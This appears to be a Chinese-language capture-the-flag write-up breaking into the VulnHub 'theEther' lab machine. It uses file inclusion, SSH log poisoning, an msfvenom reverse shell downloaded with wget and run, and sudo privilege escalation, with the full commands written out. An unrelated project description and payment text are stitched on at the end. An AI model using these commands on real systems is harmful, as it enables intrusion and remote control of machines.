vulnhub靶机渗透 theEther

theEther靶机入侵

1、环境搭建

下载地址:http://www.mediafire.com/file/502nbnbkarsoisb/theEther.zip

​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里连接到虚拟网卡1。

官方提供了一个提示:靶机中有一个相关的文件,在渗透过程中发挥重要作用,但是不要浪费时间试图去解密这个混淆后的文件。

2、信息收集

  • 主机发现

    使用nmap进行主机探测(-sP参数也可):nmap -sn 192.168.110.1/24

    在这里插入图片描述

    192.168.110.131,为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.110.1/24

  • 端口扫描

    使用nmap扫描端口,并做服务识别和深度扫描(加-A参数):nmap -p- -A 192.168.110.131
    在这里插入图片描述

    开启了22ssh服务和80web服务,web容器为Apache,系统为Ubuntu。

3、漏洞探测

  • 目录扫描

    使用dirsearch对网站目录扫描

    除了一些静态文件,没有什么发现

  • 文件包含漏洞测试

    访问网站,分析网站功能。点击ABOUT US链接后,发现URL为:http://192.168.1.101/?file=about.php,存在任意文件包含的可能。
    在这里插入图片描述

    尝试包含Linux系统的配置文件,发现存在一定的限制。包含/etc/passwd无结果
    在这里插入图片描述

    测试了几个常见的Apache日志的路径:

    /var/log/apache/access.log
    /var/log/apache2/access.log
    /var/www/logs/access.log
    /var/log/access.log
    

    尝试读Apache2的配置文件:

    /etc/apache2/apache2.conf
    

    均无结果。可能是更改了配置文件的路径

    尝试通过php伪协议读取php文件源码,也失败了

    file=php://filter/convert.base64-encode/resource=index.php
    

    靶机除了开启80web服务外,还开启了ssh服务。可以尝试读取ssh登录日志

    /var/log/auth.log
    

在这里插入图片描述

成功读取

  • getshell

    使用一句话作为用户名登陆靶机的ssh,写入ssh日志文件。获取webshell
    在这里插入图片描述

    已经有记录了,用户名被隐去了。尝试执行命令
    在这里插入图片描述

    命令执行成功,可以直接反弹shell到本地

  • 使用msf反弹shell

    msfvenom生成Meterpreter shell,首先生成Linux平台的shell程序

    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.110.129 LPORT=10086 -f elf > /home/zou/桌面/shell.elf
    

    Metasploit 设置监听

    use exploit/multi/handler
    set payload linux/x86/meterpreter/reverse_tcp
    set lhost 192.168.110.131
    set lport 10086
    exploit
    

    木马落地

    首先使用Python搭建一个Web Server:

    python -m SimpleHTTPServer 80`
    

    之后利用前面获得的一句话,执行命令,下载生成的木马,并且运行

    依次执行下列文件,需url编码
    wget 192.168.110.129:8080/shell.elf
    chmod 777 shell.elf
    ./shell.elf
    

    靶机成功下载木马
    在这里插入图片描述
    msf收到反弹shell
    在这里插入图片描述

4、权限提升

  • 获取交互式shell

    python -c 'import pty;pty.spawn("/bin/bash")'
    

在这里插入图片描述

  • sudo -l 提权

    通过sudo -l 找到一个当前用户可执行的具有root权限的文件。这应该就是提示的相关文件
    在这里插入图片描述

    利用这个文件获得root权限
    在这里插入图片描述

    拿到flag.png

    在这里插入图片描述

    /var/log/auth.log | cp /root/flag.png /var/www/html/theEther.com/public_html/flag.png
    
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
基于微信小程序的家政服务预约系统采用PHP语言和微信小程序技术,数据库采用Mysql,运行软件为微信开发者工具。本系统实现了管理员和客户、员工三个角色的功能。管理员的功能为客户管理、员工管理、家政服务管理、服务预约管理、员工风采管理、客户需求管理、接单管理等。客户的功能为查看家政服务进行预约和发布自己的需求以及管理预约信息和接单信息等。员工可以查看预约信息和进行接单。本系统实现了网上预约家政服务的流程化管理,可以帮助工作人员的管理工作和帮助客户查询家政服务的相关信息,改变了客户找家政服务的方式,提高了预约家政服务的效率。 本系统是针对网上预约家政服务开发的工作管理系统,包括到所有的工作内容。可以使网上预约家政服务的工作合理化和流程化。本系统包括手机端设计和电脑端设计,有界面和数据库。本系统的使用角色分为管理员和客户、员工三个身份。管理员可以管理系统里的所有信息。员工可以发布服务信息和查询客户的需求进行接单。客户可以发布需求和预约家政服务以及管理预约信息、接单信息。 本功能可以实现家政服务信息的查询和删除,管理员添加家政服务信息功能填写正确的信息就可以实现家政服务信息的添加,点击家政服务信息管理功能可以看到基于微信小程序的家政服务预约系统里所有家政服务的信息,在添加家政服务信息的界面里需要填写标题信息,当信息填写不正确就会造成家政服务信息添加失败。员工风采信息可以使客户更好的了解员工。员工风采信息管理的流程为,管理员点击员工风采信息管理功能,查看员工风采信息,点击员工风采信息添加功能,输入员工风采信息然后点击提交按钮就可以完成员工风采信息的添加。客户需求信息关系着客户的家政服务预约,管理员可以查询和修改客户需求信息,还可以查看客户需求的添加时间。接单信息属于本系统里的核心数据,管理员可以对接单的信息进行查询。本功能设计的目的可以使家政服务进行及时的安排。管理员可以查询员工信息,可以进行修改删除。 客户可以查看自己的预约和修改自己的资料并发布需求以及管理接单信息等。 在首页里可以看到管理员添加和管理的信息,客户可以在首页里进行家政服务的预约和公司介绍信息的了解。 员工可以查询客户需求进行接单以及管理家政服务信息和留言信息、收藏信息等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值